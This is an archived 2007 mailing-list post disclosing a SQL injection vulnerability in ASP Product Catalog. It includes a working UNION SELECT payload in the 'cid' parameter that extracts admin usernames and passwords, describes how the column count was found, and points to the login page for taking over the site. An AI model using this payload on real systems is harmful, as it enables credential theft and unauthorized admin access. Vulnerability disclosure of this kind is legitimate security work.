|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
joseph.giron13
gmail.com
Date: Sat Sep 29 2007 - 21:25:14 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
ASP Product catalog SQL injection vulnerability.
A nice little SQL injection vulnerability exists within ASP Product Catalog. The application fails to check for bad input from GET'd variables used in SQL query operations. In this case, the variable [cid] can be used for SQL injection queries. Example:
http://www.example.com/Catalog/catalog.asp?cid=8%20union%20all%20select%20Password,User_ID,Password,User_ID,Password,User_ID,Password%20from%20admin#
For those unfamiliar with how I got the table names and fields, it was retireved from the mdb file included with Asp Product catalog. A few oder by's reveals 9 columns...And we grab our username and password from the list. Now, we can login to our catalog and have fun.
http://www.example.com/catalog/login.asp
Stay secure.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]